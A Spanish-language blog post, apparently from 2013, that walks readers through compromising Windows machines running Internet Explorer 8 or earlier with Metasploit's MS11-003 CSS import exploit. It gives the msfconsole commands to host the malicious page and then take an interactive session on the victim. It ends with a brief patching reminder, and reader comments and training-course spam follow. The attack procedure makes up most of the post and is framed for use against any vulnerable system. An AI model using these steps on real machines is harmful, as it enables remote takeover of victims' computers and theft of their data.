miércoles, 9 de enero de 2013

Exploiting Windows 7 with Internet Explorer CSS Recursive Import Exploit





Existe una vulnerabilidad en las versiones 8 y anteriores de Internet Explorer que permite a un atacante vulnerar cualquier Sistema Operativo que contengan estas versiones vulnerables. Recordar que en la actualidad existen muchos exploits remotos que pueden vulnerar este navegador, pero esta vulnerabilidad no es muy "conocida" por los usuarios ya que hasta la actualidad se puede seguir explotando.  

El respectivo modulo que se integra en Metasploit se aprovecha de una vulnerabilidad de corrupción de memoria en Microsoft\'s HTML motor (mshtml). Este exploit utiliza una combinación de aspersión y el módulo de almacenamiento dinámico 'mscorie.dll' la 2.0. NET para bypassear DEP y ASLR aprovechándose así para tomar el control total del sistema vulnerable.

A continuacion se detallaran los procedimientos que un atacante realizara cuando desee vulnerar cualquier sistema operativo que contenga esta vulnerabilidad.


REQUERIMIENTOS:

  • BackTrack 5 R1 - R2 o R3 (Atacante)
  • Metasploit Framework (Atacante)
  • Windows XP - 7 - 8 (Victima)
  • Internet Explorer 8 u anteriores (Victima)

PROCEDIMIENTOS:

En la terminal/consola tecleamos msfconsole y seguidamente ejecutamos los siguientes comandos:

-------------------------------------------------------------------------------------------------------------
use exploit/windows/browser/ms11_003_ie_css_import
set SRVHOST 192.168.1.33
set SRVPORT 80
set URIPATH
exploit
-------------------------------------------------------------------------------------------------------------




Estos comandos crearan una URL con nuestra IP en la que contiene los archivos maliciosos que la victima tendrá que ejecutar desde su navegador, la cual metasploit enviara los siguientes archivos tratando de vulnerar el sistema:



Si nuestro exploit detecta que el sistema es vulnerable y los archivos enviados se logran ejecutar exitosamente en el navegador, esta devolverá una conexión entre nuestro ordenador y el sistema vulnerado.





Seguidamente ejecutamos el comando sessions -i 1 para interactuar con el sistema vulnerado y aprovecharnos al máximo de su sistema.



CONCLUSIÓN:

Para no ser victima de estos ataques que nos pueden costar mucha (informacion), es muy necesario mantener nuestro sistema totalmente actualizado a una version mayor de la vulnerable, y estar al tanto de los nuevos exploits que nos pueden afectar hoy en dia y quiza en un futuro no muy lejano.

Saludos y hasta la próxima oportunidad ;)

7 comentarios:

  1. Que tal Caleb?¡ siempre sigo tus papers y los pongo en practica en condiciones de laboratorio.
    Estos sploit de navegador para ejecutarlos en remoto puedes conectarlo mediante no-ip?

    Gracias por tan buenos post.

    ResponderEliminar
  2. Que tal Caleb, intente probar tu articulo pero obtengo este error: Exploit failed: Rex::AddressInUse The address is already in use. Me podras comentar a que se debe.

    Saludos.

    ResponderEliminar
  3. Alguién lo ha probado ¿funciona?

    ResponderEliminar
  4. Thanks for providing the best information it's very useful for Informatica learners.123trainings also provide the bestInformatica Online Training you can see free demo Informatica Online Training Demo in Hyderabad India

    ResponderEliminar
  5. I Appreciate it Itis good stuff and it is very helpful for us.Biginfosys provides best online Informatica training .

    ResponderEliminar
  6. It was nice article it was very useful for me as well as useful foronline Informatica training learners. thanks for providing this valuable information.123trainings provides best Informatica online training uk

    ResponderEliminar
  7. You have gathered Nice information I was really impressed by seeing this information, it was very interesting and it is very useful for Informatica Learners

    ResponderEliminar